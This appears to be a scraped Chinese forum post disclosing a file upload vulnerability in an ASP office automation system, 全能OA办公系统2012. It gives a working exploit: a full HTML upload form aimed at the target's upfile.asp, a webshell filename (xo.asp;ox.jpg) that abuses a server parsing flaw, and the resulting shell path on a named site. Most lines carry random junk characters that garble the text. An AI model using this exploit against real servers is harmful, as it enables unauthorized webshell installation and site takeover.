全能OA办公系统 上传漏洞
1 y+ t, ^% G- d7 E7 M
/ B3 O5 Q' p% J& Y0 j3 q系统介绍:3 T/ m4 d4 x7 c2 }( B0 i( y, I( S
8 P" [3 ~, s; R6 v, h全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
9 V( w5 Z) T$ M1 b6 j8 g8 m7 H- z2 t; f5 a" @
主要功能:
2 t6 y3 [" [. ?, O a公司通告 + w @0 _1 j1 s w) W x9 Y( [
工作计划 , }# I" W: C; r P, |% s
通讯助理 8 Q) L# n" X0 v$ i
客户资源
0 W: S6 ^0 F: {, u; R6 X; o3 u- j我的公文
. a+ T4 j6 [6 V9 |: i8 g公文传阅
7 }" |3 ^- a+ o+ [ Y, F6 A公共资源
7 f- I4 P$ D$ n y8 g- e, V资源预约
+ U6 A8 W2 U3 Y& F Z今日考勤 " v5 o# |4 p; W ~, ^
个人计划
# l5 _' t/ m7 M# y" R. i个人通讯录
* M2 B) h. z N7 ?( P5 \5 P, j' A7 f个人基本档案
5 a; c* [8 n* c9 w) h未读邮件 / Y2 u9 _9 F/ t
发邮件 3 ]/ x, W. x! J+ ]: R; z% z6 K
收件夹 : c2 I! Q4 c( G; ?4 z7 _
寄件夹 ; i2 M7 H4 M+ O2 U9 [; H6 B
网络硬盘 6 V+ a' S8 U/ F$ B( Y3 ^* s
网络会议
% {" Y; B* J Y网络调查
% t8 K, J6 V% j a# t交流论坛
5 |) {) \. A, i8 v( t. \
9 ^' ~& N9 K8 ^2 |+ V& O# O8 j2 n有兴趣测试的朋友可以下源码看看
4 u, p/ c+ u' l- R7 z; W
3 `" ^( T; n( V; d+ |8 r源码下载:2 ^" v$ j) C; J5 C+ `3 W
* g+ j( X; g, \" c; U$ c( [! q
http://www.mycodes.net/30/4750.htm0 l' B6 x3 k5 e3 _. ?
- `, h4 n3 T4 c漏洞介绍:
5 \+ F( q/ O# f1 j* g3 m4 m
( T7 N6 V5 ]* R' d; c6 ]3 D; m+ i由upfile.asp上传文件漏洞引起. n6 Y" x5 j! Q* Q' R, D+ m2 A
2 V7 A7 v, L0 ^" C
测试方法:
% I: z) w2 [" X; |, N- x2 s @9 Y, o& ~
使用名小子上传http://www.itlynn.com/upfile.asp即可
' R5 a" X/ I I' {0 A" Q# l7 F: }( ?+ U, c$ R8 G) b( G
如果upfile.asp文件被删除不存在。( i( ^! i; L8 J& m: a' I+ Q
( E7 {) I0 s) v, v' _; O$ L 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。! d% ?5 C! [7 B2 Y* D
" ^6 [5 l C6 d( n1 n( \* j1 \1 y
如果存在那么将如下代码保存为upfile.html。- |8 r: {$ `, D& W0 Y
( {& ~& u. Y9 f* ]. _8 K; z
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。. l, E3 {) ?; [; q3 j
# k' o& v' I" v; a( H9 ~ 4 i9 b, a# S# [+ d
8 \4 [& R' y" d+ P: y7 Z
01 <table border='0' align="center" cellpadding="5">
9 ~* m: _6 F. Y0 X0 ]8 Q# z) E
; @( M8 e+ z0 F# w, R/ p02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
+ y, K' H- s/ I+ n' h+ X' T/ t, z6 u; e9 q# w1 z
03 <tr>
4 A. D1 Q' K3 D e5 p" e ?4 E; C! R8 ]$ L1 q% h/ [" b
04 <td>报错:</td>
" Z$ X. t: l& A% `5 T2 z" }0 c# J: k. X, T9 t
05 <td><input type='radio' name='errnumber' value='0'> ) Z/ }' p% H7 H
+ r* g: b: l% H4 V06 自动更名
2 x$ |5 H$ R1 ^
. k* @1 B2 d% k9 ^07 <input type='radio' name='errnumber' value='1' checked> 1 Z+ @, ?9 r7 n. U* R
# w% g7 x4 [7 `6 a3 h2 I; Q
08 报错方式
5 z9 ?& t5 P' m) v! o! W/ H. p; X
- Z+ D/ r, N+ M2 C+ Q8 J09 <input type='radio' name='errnumber' value='2'>
! S8 o2 P6 v# G, f4 l8 _' K2 J j9 @, @1 ~- U
10 直接覆盖</td> ' W; B0 e" K- Z5 X" s" D
7 u# M. N; K6 L11 </tr>
) b" P, }7 a- n: r& b# r, o# G0 t* C, p" {% L% h
12 <tr>
# X) {# ]5 ]/ s# L$ Y+ a1 R2 q3 A2 u2 ]! l) x
13 <td>主题:</td>
- p/ @ U; n8 L+ q# C4 b, E! h+ X1 ?
14 <td><input type='text' name='filename' size='30'></td> - L# Z4 a3 M% I) ~" w# _
; E6 _/ E, I M# a: b$ S# U15 </tr> ' w0 `( i+ M$ o
: D# {* o& o! A$ j L
16 <tr>
6 ]5 t- Z: u$ w3 W& t! X2 {1 i {! Y
17 <td>文件:</td>
* o% m% N$ t1 d6 S
* V. _6 r" Q; Q3 }/ c18 <td><input type="file"name="fruit"size="30"></td> ; r4 x# Q) R ^: w0 o- m
! Q* O5 O. w# W# x! O19 </tr>
% W! Q" y' u; D1 s k2 E) R/ P) y }/ {. s% D/ E
20 <tr> 4 g' O* B% J6 Y' f- Z8 c
3 S% g. W) v( s0 U6 c; Y3 J
21 <td valign='top'>简介:</td> ( R& g% l) M6 [: u1 W+ E) c7 w
4 J& S* I' {7 E4 C22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 0 G! y; D5 L: j5 Q) j- [) s. a
5 q9 R/ d- e/ N# m" T* s/ t/ h
23 </tr> 8 Z+ `# T% Z- n5 {, U% b8 L0 {. k( Z
9 _3 u2 o/ `( u2 F6 v3 t0 ]5 u
24 ! B" G3 Z5 g3 ]& _, c
* E0 ]2 T0 d8 G8 I! W$ X* [( h
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
% E3 O) e! y1 d* c) u! Q6 S9 O
26 </tr> / Z4 O+ W8 @& s4 h8 [+ q
2 a* y; H4 g3 t2 s6 j( @" J27 </form> * |8 B" P* f1 y' X5 O7 m6 M3 i
6 R7 u: S& C$ E
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
( f/ n% z! v$ O$ q# G
. j! e z* G( E
! _0 X; m) n0 E4 l, ~8 w
4 u7 E5 m; a! D上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg! X J4 G" a5 ^% }
) O( S! D, }! P+ f, T9 B) O此漏洞需要配合解析漏洞利用。
% h) U8 i8 j$ E% f9 Q7 P$ r) ~$ Y3 z: H% B1 v
|